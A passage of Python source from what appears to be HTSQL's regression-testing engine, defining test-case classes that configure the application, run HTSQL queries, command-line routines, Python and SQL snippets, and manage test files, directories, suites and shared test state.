name = "app"
hint = """configure the HTSQL application"""
help = """
To run HTSQL requests, the testing engine needs to create an HTSQL
application. This test case allows you to configure the application
parameters.
"""
class Input(TestData):
fields = [
Field('db', DBVal(is_nullable=True),
hint="""the connection URI"""),
Field('extensions', MapVal(StrVal(),
MapVal(StrVal(), AnyVal())),
default={},
hint="""include extra extensions"""),
Field('save', StrVal(), default=None,
hint="""name of the configuration""")
] + SkipTestCase.Input.fields
def out_header(self):
# Overriden to avoid printing the password to the database.
# Clone `input.db`, but omit the password.
db = self.input.db
if db is not None:
sanitized_db = DB(engine=db.engine,
username=db.username,
password=None,
host=db.host,
port=db.port,
database=db.database,
options=db.options)
else:
sanitized_db = "-"
# Print:
# ---------------- ... -
# APP {sanitized_db}
# ({input.location})
self.out_sep()
self.out("%s %s" % (self.name.upper(), sanitized_db), indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Create an application and update the testing state. The created
# application will be in effect for the subsequent tests in the
# current suite and all the nested suites unless overridden.
from htsql import HTSQL
self.state.app = None
try:
self.state.app = HTSQL(self.input.db,
self.input.extensions)
except Exception:
self.out_exception(sys.exc_info())
return self.failed("*** an exception occured while"
" initializing an HTSQL application")
# Record the configuration.
if self.input.save is not None:
self.state.saves[self.input.save] = (self.input.db,
self.input.extensions)
return self.passed()
class LoadAppTestCase(SkipTestCase):
"""
Loads an existing configuration of an HTSQL application.
"""
name = "load-app"
hint = """activate an existing HTSQL application"""
help = """
This test case loads a previously saved application configuration.
"""
class Input(TestData):
fields = [
Field('load', StrVal(),
hint="""name of the configuration"""),
Field('extensions', MapVal(StrVal(),
MapVal(StrVal(), AnyVal())),
default={},
hint="""include extra extensions"""),
Field('save', StrVal(), default=None,
hint="""name of the new configuration""")
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Find the configuration data; complain if not found.
if self.input.load not in self.state.saves:
return self.failed("*** unknown configuration name %s"
% self.input.load)
configuration = self.state.saves[self.input.load]
# Add new extensions.
configuration = configuration+(self.input.extensions,)
# Create an application and update the testing state.
from htsql import HTSQL
self.state.app = None
try:
self.state.app = HTSQL(*configuration)
except Exception:
self.out_exception(sys.exc_info())
return self.failed("*** an exception occured while"
" initializing an HTSQL application")
# Record the new configuration.
if self.input.save is not None:
self.state.saves[self.input.save] = configuration
return self.passed()
class IncludeTestCase(SkipTestCase):
"""
Loads input test data from a file.
"""
name = "include"
hint = """load input data from a file"""
help = """
This test case allows you to execute a test case or a test suite defined
in a separate file.
"""
class Input(TestData):
fields = [
Field('include', StrVal(),
hint="""file containing input test data"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('include', StrVal(),
hint="""file containing input test data"""),
Field('output', ClassVal(TestData),
hint="""the corresponding output test data"""),
]
def __init__(self, routine, state, input, output):
super(IncludeTestCase, self).__init__(routine, state, input, output)
# Load the input data and create the corresponding test case.
self.included_input = routine.load_input(self.input.include)
case_class = self.included_input.case_class
self.included_output = None
if self.output is not None:
if case_class.matches(self.included_input, self.output.output):
self.included_output = self.output.output
self.case = case_class(routine, state,
self.included_input,
self.included_output)
def get_suites(self):
# Get the set of nested suites.
return self.case.get_suites()
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Run the included test.
self.case.verify()
def train(self):
# Check if the test is skipped.
if self.skipped():
return self.output
# Run the included test; get the output.
new_output = self.case.train()
# Three outcomes are possible: the test generated no output, in this
# case we don't need to create an output record either; the test
# generated new or updated output, we have to update our output as
# well; and finally, the test output didn't change, we could keep
# ours too.
if new_output is None:
output = None
elif new_output is not self.included_output:
output = self.make_output(include=self.input.include,
output=new_output)
else:
output = self.output
return output
class SuiteTestCase(SkipTestCase):
"""
Implements a container of test cases.
"""
name = "suite"
hint = """contains other test cases"""
help = """
A test suite is a container of test cases. Typically, it is the
top-level test case in a test file.
The testing engine allows you to specify what suites to run by their
ids.
"""
class Input(TestData):
fields = [
Field('title', StrVal(),
hint="""the description of the suite"""),
Field('id', StrVal(), None,
hint="""the code name of the suite"""),
Field('output', StrVal(), None,
hint="""file to save the output of the tests"""),
Field('tests', SeqVal(ClassVal(TestData)),
hint="""a list of test inputs"""),
] + SkipTestCase.Input.fields
def init_attributes(self):
# When `id` is not specified, generate it from the title.
if self.id is None:
self.id = self.title.lower().replace(' ', '-')
class Output(TestData):
fields = [
Field('id', StrVal(),
hint="""the code name of the suite"""),
Field('tests', SeqVal(ClassVal(TestData)),
hint="""a list of test outputs"""),
]
def __init__(self, routine, state, input, output):
super(SuiteTestCase, self).__init__(routine, state, input, output)
# A test suite has an ability to save its test output to a separate
# file. In this case, `self.ext_output` contains the test data
# loaded from the file.
self.ext_output = None
if input.output is not None and os.path.exists(input.output):
ext_output = routine.load_output(input.output)
if self.matches(input, ext_output):
self.ext_output = ext_output
# Generate a list of test cases.
self.cases = []
self.cases_state = TestState()
self.init_cases()
def init_cases(self):
# Generate a list of test cases. We have two independent lists:
# one containing input test records and the other containing
# output test records. Our goal is to find matching pairs and
# generate the corresponding test cases.
# The matching pairs of input and output data.
pairs = []
# List of available output records. We need to copy it since
# it is going to be modified.
available_outputs = []
if self.ext_output is not None:
available_outputs = self.ext_output.tests[:]
elif self.output is not None:
available_outputs = self.output.tests[:]
# For each input record, find the matching output record.
for input in self.input.tests:
case_class = input.case_class
for idx, output in enumerate(available_outputs):
if case_class.matches(input, output):
pairs.append((input, output))
del available_outputs[idx]
break
else:
pairs.append((input, None))
# Initialize the test cases.
for input, output in pairs:
case_class = input.case_class
case = case_class(self.routine, self.cases_state, input, output)
self.cases.append(case)
def get_suites(self):
# Get a set of (this and) the nested suites.
suites = set([self.input.id])
for case in self.cases:
suites |= case.get_suites()
return suites
def out_header(self):
# Print the header:
# ================ ... =
# {input.title}
# ({input.location})
self.out_sep("=")
self.out(self.input.title, indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def skipped(self):
# Check if the suite should not be executed.
# Check if the test case was explicitly disabled.
if super(SuiteTestCase, self).skipped():
return True
# The suite is skipped when:
# - the user specified an explicit list of the suites to run;
# - and the suite is not one of them;
# - and the suite does not contain any selected nested suite;
# - and the suite is not nested in some selected suite.
if not self.routine.suites:
return False
if self.state.with_all_suites:
return False
if self.input.id in self.routine.suites:
self.cases_state.with_all_suites = True
return False
if self.get_suites() & set(self.routine.suites):
return False
return True
def verify(self):
# Run the suite.
# Push the current state to the cases state.
self.state.push(self.cases_state)
# Check if the suite is disabled or if the user specified
# the suites to run and this one is not among them.
if self.skipped():
return
# Display the headers.
self.out_header()
# Run the nested test cases.
for case in self.cases:
case.verify()
# Check if the user asked to halt the testing.
if self.cases_state.is_exiting:
break
# Pull the statistical information from the cases state.
self.state.pull(self.cases_state)
def train(self):
# Run the suite; update the test output if necessary.
# Push the current state to the cases state.
self.state.push(self.cases_state)
# Check if the suite is disabled or if the user specified
# the suites to run and this one is not among them.
if self.skipped():
return self.output
# A dictionary containing the output (or `None`) generated by test
# cases when it differs from the existing test output.
new_output_by_case = {}
# Display the header.
self.out_header()
# Run the nested tests.
for case in self.cases:
new_output = case.train()
# Record modified output data.
if new_output is not case.output:
new_output_by_case[case] = new_output
# Check if the user asked to halt the testing.
if self.cases_state.is_exiting:
break
# Pull the statistical information from the cases state.
self.state.pull(self.cases_state)
# Generate a new output record.
output = self.make_output(new_output_by_case)
# The output is kept in a separate file.
if self.input.output is not None:
# If the output has been updated, ask the user if they want
# to save it.
if output is not self.ext_output:
self.out_sep()
reply = self.ask_save()
if reply is DO_DISCARD:
# `self.output` may still be not ``None`` if the `output`
# field was recently added. In that case, we don't want
# to delete the regular output data until it is saved
# to a separate file.
return self.output
self.out("*** saving test output data to %r"
% self.input.output)
self.routine.save_output(self.input.output, output)
# Returning `None` since the output is saved to a separate file.
return None
return output
def make_output(self, new_output_by_case):
# Generate the output test data.
# Here we update the list of output test records. Note that the list
# may contain some inactive output records. These output records
# do not correspond to any input records and thus have no respective
# test case. It may happen if the user removed or modified the input
# data. Since a test case may be only temporarily disabled, we never
# remove inactive output records unless the `--purge` option is enabled.
# The list of the output records.
tests = []
# Start with the original list of output records.
if self.output is not None:
tests = self.output.tests[:]
if self.ext_output is not None:
tests = self.ext_output.tests[:]
# `--purge` is enabled, we don't have to keep inactive records,
# so simply generate the list from scratch.
if self.routine.purge and not self.state.is_exiting:
tests = []
for case in self.cases:
output = case.output
if case in new_output_by_case:
output = new_output_by_case[case]
if output is not None:
tests.append(output)
# Some test cases generated new output, so we need to update the list.
elif new_output_by_case:
# Here we take the original list of records and replace those
# that have been updated. We may also encounter a new output
# record, which has no corresponding old record in the list.
# For that new record, we need to find a position in the list.
# We want the order of the output records to match the order
# of their respective input records, so to ensure this, we
# put any new record immediately after all other records processed
# so far.
# Position to put new records.
next_idx = 0
for case in self.cases:
# The record has been added, removed or updated.
if case in new_output_by_case:
new_output = new_output_by_case[case]
# The record is rarely entirely removed so we should almost
# never get ``None`` here. If we do, do nothing.
if new_output is not None:
# This is an updated record: replace the old record
# and update the position for the following new
# records.
if case.output in tests:
idx = tests.index(case.output)
tests[idx] = new_output
if idx >= next_idx:
next_idx = idx+1
# This is a new record: place it to the designated
# position.
else:
tests.insert(next_idx, new_output)
next_idx += 1
# The record has not been changed.
else:
# Make sure any new record will go after this one.
if case.output in tests:
idx = tests.index(case.output)
if idx >= next_idx:
next_idx = idx+1
# When there are no test output data, skip creating the output record.
if not tests:
return None
# Now we need to check if the new output list coincides with the old
# one, in which case we don't want to create a new output record.
if self.input.output is not None:
if self.ext_output is not None and self.ext_output.tests == tests:
return self.ext_output
else:
if self.output is not None and self.output.tests == tests:
return self.output
# Generate and return new output data.
output = super(SuiteTestCase, self).make_output(id=self.input.id,
tests=tests)
return output
class QueryTestCase(RunAndCompareTestCase):
"""
Performs an HTSQL query.
"""
name = "query"
hint = """execute an HTSQL query"""
help = """
This test case executes an HTSQL query.
"""
class Input(TestData):
fields = [
Field('uri', StrVal(),
hint="""the HTSQL query"""),
Field('method', ChoiceVal(['GET', 'POST']), 'GET',
hint="""the HTTP method (GET or POST)"""),
Field('remote_user', StrVal(), None,
hint="""the HTTP remote user"""),
Field('headers', MapVal(StrVal(), StrVal()), None,
hint="""the HTTP headers"""),
Field('content_type', StrVal(), None,
hint="""the content type of HTTP POST data"""),
Field('content_body', StrVal(), None,
hint="""the HTTP POST data"""),
Field('expect', IntVal(), 200,
hint="""the HTTP status code to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the response body"""),
Field('ignore_headers', BoolVal(), False,
hint="""ignore the response headers"""),
] + SkipTestCase.Input.fields
def init_attributes(self):
# Check that `content-type` and `content-body` are set only if
# the HTTP method is `POST`.
if self.method == 'GET':
if self.content_type is not None:
raise ValueError("unexpected content-type parameter"
" for a GET request")
if self.content_body is not None:
raise ValueError("unexpected content-body parameter"
" for a GET request")
if self.method == 'POST':
if self.content_body is None:
raise ValueError("no expected content-body parameter"
" for a POST request")
class Output(TestData):
fields = [
Field('uri', StrVal(),
hint="""the HTSQL query"""),
Field('status', StrVal(),
hint="""the response status line"""),
Field('headers', SeqVal(SeqVal(StrVal(), length=2)),
hint="""the response headers"""),
Field('body', StrVal(),
hint="""the response body"""),
]
def init_attributes(self):
# Convert the list of two-element lists to a list of pairs.
self.headers = [(key, value) for key, value in self.headers]
def out_header(self):
# Display the header:
# ---------------- ... -
# {method} {uri}
# ({input.location})
# Remote-User: {remote_user}
# {header}: value
# ...
# Content-Type: {content_type}
#
# {content_body}
self.out_sep()
self.out("%s %s" % (self.input.method, self.input.uri), indent=2)
self.out("(%s)" % self.input.location, indent=2)
if self.input.remote_user is not None:
self.out("Remote-User: %s" % self.input.remote_user, indent=2)
if self.input.headers:
for key in sorted(self.input.headers):
value = self.input.headers[key]
self.out("%s: %s" % (key, value), indent=2)
if self.input.content_type is not None:
self.out("Content-Type: %s" % self.input.content_type, indent=2)
self.out()
if self.input.content_body:
self.out_lines(self.input.content_body.splitlines(), indent=2)
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if old_output.status != new_output.status:
return True
if not self.input.ignore_headers:
if old_output.headers != new_output.headers:
return True
if not self.input.ignore:
if old_output.body != new_output.body:
return True
return False
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
lines = []
lines.append(output.status)
for header, value in output.headers:
lines.append("%s: %s" % (header, value))
lines.append("")
lines.extend(output.body.splitlines())
return lines
def execute(self):
# Execute the query; return the output.
# Prepare the HTSQL application.
app = self.state.app
if app is None:
return self.failed("*** no HTSQL application is defined")
# Prepare and execute the query.
request = Request.prepare(method=self.input.method,
query=self.input.uri,
remote_user=self.input.remote_user,
content_type=self.input.content_type,
content_body=self.input.content_body,
extra_headers=self.input.headers)
response = request.execute(app)
# Check if the response is valid.
if response.exc_info is not None:
self.out_exception(response.exc_info)
return self.out("*** an exception occured"
" while executing the query")
if not response.complete():
return self.out("*** the response is not complete")
# Generate the output record.
new_output = self.make_output(uri=self.input.uri,
status=response.status,
headers=response.headers,
body=response.body)
# Check if we get the expected status code (200, by default).
# If not, display the response and discard the output.
if not response.status.startswith(str(self.input.expect)):
self.out_diff(self.output, new_output)
return self.out("*** unexpected status code: %s"
% response.status)
return new_output
class CtlTestCase(RunAndCompareTestCase):
"""
Executes a script routine.
"""
name = "ctl"
hint = """execute a routine"""
help = """
This test case simulates a run of the HTSQL command-line application.
"""
class Input(TestData):
fields = [
Field('ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard input"""),
Field('expect', IntVal(), 0,
hint="""the exit code to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the exit code and the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdout', StrVal(),
hint="""the content of the standard output"""),
Field('exit', IntVal(),
hint="""the exit code"""),
]
def out_header(self):
# Display the header:
# ---------------- ... -
# {EXECUTABLE} {ctl}
# ({input.location})
self.out_sep()
executable = os.path.basename(self.routine.executable)
command_line = " ".join([executable.upper()]+self.input.ctl)
self.out(command_line, indent=2)
self.out("(%s)" % self.input.location, indent=2)
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if not self.input.ignore:
if old_output.exit != new_output.exit:
return True
if old_output.stdout != new_output.stdout:
return True
return False
def render(self, output):
# Convert the output to a list of lines.
if output is None:
return None
return output.stdout.splitlines()
def execute(self):
# Run the routine; return the output
# Prepare the standard streams and the script instance.
stdout = io.StringIO()
stderr = stdout
stdin = TermStringIO(self.input.stdin, stdout)
command_line = [self.routine.executable]+self.input.ctl
# The script class.
ctl_class = self.routine.ctl.__class__
# Initialize and execute the script; check for exceptions.
try:
ctl = ctl_class(stdin, stdout, stderr)
exit = ctl.main(command_line)
except:
self.out_exception(sys.exc_info())
return self.out("*** an exception occured"
" while running the application")
# Normalize the exit code.
if exit is None:
exit = 0
elif not isinstance(exit, int):
stderr.write(str(exit))
exit = 1
# Generate a new output record.
new_output = self.make_output(ctl=self.input.ctl,
stdout=stdout.getvalue(),
exit=exit)
# Check if we get the expected exit code; if not, display
# the content of stdout and discard the output record.
if not self.input.ignore:
if new_output.exit != self.input.expect:
self.out_diff(self.output, new_output)
return self.out("*** unexpected exit code: %s" % exit)
return new_output
class Fork(object):
"""
Keeps information on the started processes.
Class attributes:
`active_forks`
The global list of active processes.
`is_atexit_registered`
Indicates whether an :func:`atexit.atexit` callable was registered.
The callable is called when the script is about to finish and kills
any remaining active processes.
Attributes:
`process` (an instance of :class:`subprocess.Popen`)
The wrapped process.
`temp_path` (a string)
A directory containing two files: `input` and `output`, which
keeps the content of the standard input and the standard output
respectively.
"""
active_forks = []
is_atexit_registered = False
@classmethod
def start(cls, executable, arguments, input):
"""
Starts a new process.
`executable`
The path to the executable.
`arguments`
The list of arguments (not including the executable).
`input`
The content of the standard input.
Returns a new :class:`Fork` instance.
"""
# Create a temporary directory with the files 'input' and 'output'.
temp_path = tempfile.mkdtemp()
stream = open("%s/input" % temp_path, 'wb')
stream.write(input)
stream.close()
# Prepare the standard input and the standard output streams.
stdin = open("%s/input" % temp_path, 'rb')
stdout = open("%s/output" % temp_path, 'wb')
# Start the process.
try:
process = subprocess.Popen([executable]+arguments,
stdin=stdin,
stdout=stdout,
stderr=subprocess.STDOUT)
except:
shutil.rmtree(temp_path)
raise
# Return a new `Fork` instance.
return cls(process, temp_path)
@classmethod
def atexit(cls):
# Finalize any remaining active processes.
for fork in cls.active_forks:
fork.end()
@classmethod
def atexit_register(cls):
# Register the `atexit` callable if not done already.
if not cls.is_atexit_registered:
atexit.register(cls.atexit)
cls.is_atexit_registered = True
def __init__(self, process, temp_path):
# Sanity check on the arguments.
assert isinstance(process, subprocess.Popen)
assert isinstance(temp_path, str) and os.path.isdir(temp_path)
self.process = process
self.temp_path = temp_path
# Save themselves in the global list of active processes.
self.active_forks.append(self)
# Register the `atexit` callback.
self.atexit_register()
def end(self):
"""
Ends the process.
Returns the content of the standard output.
"""
# Terminate the process if it is still alive.
if self.process.poll() is None:
self.process.terminate()
time.sleep(1.0)
# Read the standard output.
stream = open("%s/output" % self.temp_path, 'rb')
output = stream.read()
stream.close()
# Remove the temporary directory.
shutil.rmtree(self.temp_path)
# Remove it from the list of active processes.
self.active_forks.remove(self)
return output
class StartCtlTestCase(SkipTestCase):
"""
Starts a long-running routine.
"""
name = "start-ctl"
hint = """execute a long-running routine"""
help = """
This test case starts a long-running the HTSQL command-line
application. Use the `end-ctl` test case to finalize the application
and check the output.
"""
class Input(TestData):
fields = [
Field('start_ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard output"""),
Field('sleep', UFloatVal(), 0,
hint="""sleep for the specified number of seconds"""),
] + SkipTestCase.Input.fields
def verify(self):
# Execute the test.
# Check if the test case is skipped.
if self.skipped():
return
# Check if an application with the same command-line parameters
# has already been started.
key = tuple(self.input.start_ctl)
if key in self.state.forks:
return self.fork("*** the application is already started")
# Start and save the process.
fork = Fork.start(self.routine.executable,
self.input.start_ctl,
self.input.stdin)
self.state.forks[key] = fork
class EndCtlTestCase(RunAndCompareTestCase):
"""
Terminates a long-running routine.
"""
name = "end-ctl"
hint = """terminate a long-running routine"""
help = """
This test case allows you to terminate a long-running routine started
with `start-ctl`.
"""
class Input(TestData):
fields = [
Field('end_ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('ignore', BoolVal(), False,
hint="""ignore the exit code and the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('end_ctl', SeqVal(StrVal()),
hint="""a list of command-line parameters"""),
Field('stdout', StrVal(),
hint="""the standard output"""),
]
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if not self.input.ignore:
if old_output.stdout != new_output.stdout:
return True
return False
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
return output.stdout.splitlines()
def execute(self):
# Execute the test case.
# Find the active process with the same command-line artguments.
key = tuple(self.input.end_ctl)
if key not in self.state.forks:
return self.out("*** the application has not been started")
fork = self.state.forks.pop(key)
# Terminate the process; get the standard output.
stdout = fork.end()
# Create and return the output record.
new_output = self.make_output(end_ctl=self.input.end_ctl,
stdout=stdout)
return new_output
class PythonCodeTestCase(RunAndCompareTestCase):
"""
Executes arbitrary Python code.
"""
name = "python"
hint = """execute Python code"""
help = """
This test case allows you to execute arbitrary Python code.
"""
class Input(TestData):
fields = [
Field('py', WordVal(),
hint="""the code name"""),
Field('code', StrVal(),
hint="""Python code"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard input"""),
Field('expect', StrVal(), None,
hint="""the name of an exception to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('py', WordVal(),
hint="""the code name"""),
Field('stdout', StrVal(),
hint="""the content of the standard output"""),
]
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
if not self.input.ignore:
if old_output.stdout != new_output.stdout:
return True
return False
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
return output.stdout.splitlines()
def execute(self):
# Execute the test case.
# Prepare new standard streams.
old_stdin = sys.stdin
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdin = io.StringIO(self.input.stdin)
sys.stdout = io.StringIO()
sys.stderr = sys.stdout
# Prepare the code.
code = self.load()
context = {'state': self.state}
# Execute the code.
exc_info = None
try:
exec(code, context)
except:
exc_info = sys.exc_info()
# Make new output record.
key = self.input.fields[0].attribute
new_output = self.make_output(stdout=sys.stdout.getvalue(),
**{key: getattr(self.input, key)})
# Restore old standard streams.
sys.stdin = old_stdin
sys.stdout = old_stdout
sys.stderr = old_stderr
# An exception occured while running the code.
if exc_info is not None:
# Display the output and the exception
self.out_diff(self.output, new_output)
self.out_exception(exc_info)
exc_name = exc_info[0].__name__
# The exception was unexpected: discard the output.
if self.input.expect is None or self.input.expect != exc_name:
return self.out("*** an unexpected exception occured")
else:
# We didn't get the expected exception: discard the output.
if self.input.expect is not None:
return self.out("*** an expected exception did not occur")
return new_output
def load(self):
# Get the script source code.
return self.input.code
class PythonCodeIncludeTestCase(PythonCodeTestCase):
"""
Executes arbitrary Python code loaded from a file.
"""
name = "python-include"
hint = """load and execute Python code"""
help = """
This test case allows you to execute arbitrary Python code
loaded from a file.
"""
class Input(TestData):
fields = [
Field('py_include', StrVal(),
hint="""the file containing Python code"""),
Field('stdin', StrVal(), '',
hint="""the content of the standard input"""),
Field('expect', StrVal(), None,
hint="""the name of an exception to expect"""),
Field('ignore', BoolVal(), False,
hint="""ignore the standard output"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('py_include', StrVal(),
hint="""the file containing Python code"""),
Field('stdout', StrVal(),
hint="""the content of the standard output"""),
]
def load(self):
# Get the script code from the given file
stream = open(self.input.py_include, 'rb')
code = stream.read()
stream.close()
return code
class SQLTestCase(SkipTestCase):
"""
Executes a SQL query.
"""
name = "sql"
hint = """execute a SQL statement"""
help = """
This test case executes one or multiple SQL statements.
"""
class Input(TestData):
fields = [
Field('connect', DBVal(),
hint="""the connection URI"""),
Field('sql', StrVal(),
hint="""the statements to execute"""),
Field('autocommit', BoolVal(), False,
hint="""use the auto-commit mode"""),
Field('ignore', BoolVal(), False,
hint="""ignore any errors"""),
] + SkipTestCase.Input.fields
def out_header(self):
# Print:
# ---------------- ... -
# {first line of input.sql}
# ({input.location})
self.out_sep()
first_line = self.input.sql.split('\n', 1)[0]
self.out(first_line, indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Load the SQL input data.
sql = self.load()
# Generate an HTSQL application. We need an application instance
# to split the SQL data and to connect to the database, but we
# never use it for executing HTSQL queries.
from htsql import HTSQL
from htsql.core.error import Error
from htsql.core.connect import connect
from htsql.core.split_sql import split_sql
try:
app = HTSQL(self.input.connect)
except Exception as exc:
self.out_exception(sys.exc_info())
return self.failed("*** an exception occured while"
" initializing an HTSQL application")
# Activate the application so that we could use the splitter
# and the connection adapters.
with app:
# Realize a splitter and split the input data to individual
# SQL statements.
try:
statements = list(split_sql(sql))
except ValueError as exc:
return self.failed("*** invalid SQL: %s" % exc)
# Realize the connector and connect to the database.
try:
connection = connect(with_autocommit=self.input.autocommit)
cursor = connection.cursor()
except Error as exc:
return self.failed("*** failed to connect to the database:"
"\n%s" % exc)
# Execute the given SQL statements.
for statement in statements:
try:
# Execute the statement in the current connection.
cursor.execute(statement)
except Error as exc:
# Display the statement that caused a problem.
for line in statement.splitlines():
self.out(line, indent=4)
# Normally, we end the test case when an error occurs,
# but if `ignore` is set, we just break the loop.
if not self.input.ignore:
return self.failed("*** failed to execute SQL:"
"\n%s" % exc)
break
# No error occurred while executing the SQL statements.
else:
# Commit the transaction unless `autocommit` mode is set.
# Again, respect the `ignore` flag.
if not self.input.autocommit:
try:
connection.commit()
except Error as exc:
if not self.input.ignore:
return self.failed("*** failed to commit"
" a transaction:\n%s" % exc)
# Close the connection. Note that we insist that connection
# is opened and closed successfully regardless of the value
# of the `ignore` flag.
try:
connection.close()
except Error as exc:
return self.failed("*** failed to close the connection:"
"\n%s" % exc)
# If we reached that far, we passed the test.
return self.passed()
def load(self):
"""
Returns the SQL data to execute.
"""
# Override when subclassing.
return self.input.sql
class SQLIncludeTestCase(SQLTestCase):
"""
Loads SQL queries from a file and executes them.
"""
name = "sql-include"
hint = """load and execute SQL statements"""
help = """
This test case loads SQL statements from a file and execute them.
"""
class Input(TestData):
fields = [
Field('connect', DBVal(),
hint="""the connection URI"""),
Field('sql_include', StrVal(),
hint="""the file containing SQL statements"""),
Field('autocommit', BoolVal(), False,
hint="""use the auto-commit mode"""),
Field('ignore', BoolVal(), False,
hint="""ignore any errors"""),
] + SkipTestCase.Input.fields
def out_header(self):
# Print:
# ---------------- ... -
# SQL-INCLUDE {input.sql_include}
# ({input.location})
self.out_sep()
self.out("%s %s" % (self.name.upper(), self.input.sql_include),
indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def load(self):
# Load SQL from the given file.
stream = open(self.input.sql_include, 'rb')
sql = stream.read()
stream.close()
return sql
class WriteToFileTestCase(SkipTestCase):
"""
Writes some data to a file.
"""
name = "write-to-file"
hint = """write some data to a file"""
help = None
class Input(TestData):
fields = [
Field('write', StrVal(),
hint="""the file name"""),
Field('data', StrVal(),
hint="""the data to write"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Write the data to the file.
stream = open(self.input.write, 'wb')
stream.write(self.input.data)
stream.close()
class ReadFromFileTestCase(RunAndCompareTestCase):
"""
Reads the file content.
"""
name = "read-from-file"
hint = """read the content of a file"""
help = None
class Input(TestData):
fields = [
Field('read', StrVal(),
hint="""the file name"""),
] + SkipTestCase.Input.fields
class Output(TestData):
fields = [
Field('read', StrVal(),
hint="""the file name"""),
Field('data', StrVal(),
hint="""the content of the file"""),
]
def differs(self, old_output, new_output):
# Check if the actual output differs from the expected output.
if old_output is None or new_output is None:
return True
return (old_output.data != new_output.data)
def render(self, output):
# Convert the output record to a list of lines.
if output is None:
return None
return output.data.splitlines()
def execute(self):
# Execute the test.
# Check if the file exists.
if not os.path.exists(self.input.read):
return self.out("*** file %r does not exist" % self.input.read)
# Read the data and create the output record.
stream = open(self.input.read, 'rb')
data = stream.read()
stream.close()
new_output = self.make_output(read=self.input.read, data=data)
return new_output
class RemoveFilesTestCase(SkipTestCase):
"""
Removes the specified files.
"""
name = "remove-files"
hint = """remove the specified files"""
help = """
Remove a list of files. It is not an error if some of the files do not
exist.
"""
class Input(TestData):
fields = [
Field('remove', SeqVal(StrVal()),
hint="""a list of files to remove"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Remove the given files.
for path in self.input.remove:
if os.path.exists(path):
os.unlink(path)
class MakeDirTestCase(SkipTestCase):
"""
Creates a directory.
"""
name = "make-dir"
hint = """create a directory"""
help = """
Create a directory. If necessary, all intermediate directories are also
created.
"""
class Input(TestData):
fields = [
Field('mkdir', StrVal(),
hint="""the directory name"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Create the directory if it does not already exist.
if not os.path.isdir(self.input.mkdir):
os.makedirs(self.input.mkdir)
class RemoveDirTestCase(SkipTestCase):
"""
Removes a directory.
"""
name = "remove-dir"
hint = """remove a directory"""
help = """
Removes a directory with all its content. It is not an error if the
directory does not exist.
"""
class Input(TestData):
fields = [
Field('rmdir', StrVal(),
hint="""the directory name"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# Remove the directory with all its content (DANGEROUS!).
if os.path.exists(self.input.rmdir):
shutil.rmtree(self.input.rmdir)
class TestState(object):
"""
Keeps the mutable state of the testing process.
`app`
The current HTSQL application.
`forks`
A mapping from command-line parameters to :class:`Fork`
instances; contains long-running applications.
`toggles`
A set of active named toggles.
`saves`
A mapping of named application configurations.
`with_all_suites`
Indicates that the current suite or one of its ancestors
was explicitly selected by the user.
`passed`
The current number of passed tests.
`failed`
The current number of failed tests.
`updated`
The current number of updated tests.
`is_exiting`
Indicates whether the user asked to halt the testing.
"""
def __init__(self, app=None, forks=None, toggles=None, saves=None,
with_all_suites=False, passed=0, failed=0, updated=0,
is_exiting=False):
self.app = app
self.forks = forks or {}
self.toggles = toggles or set()
self.saves = saves or {}
self.with_all_suites = with_all_suites
self.passed = passed
self.failed = failed
self.updated = updated
self.is_exiting = is_exiting
def push(self, other):
"""
Push the state data to a derived state.
`other` (:class:`TestState`)
A derived state, the state created by a suite for
the suite test cases.
"""
other.app = self.app
other.forks = self.forks.copy()
other.toggles = self.toggles.copy()
other.saves = self.saves.copy()
other.with_all_suites = self.with_all_suites
other.passed = self.passed
other.failed = self.failed
other.updated = self.updated
other.is_exiting = self.is_exiting
def pull(self, other):
"""
Pull the state from a derived state.
Note that only statistical information is pulled from
the derived state.
`other` (:class:`TestState`)
A derived state, the state created by a suite for
the suite test cases.
"""
self.passed = other.passed
self.failed = other.failed
self.updated = other.updated
self.is_exiting = other.is_exiting
# The base classes for the YAML loaders and dumpers. When available,
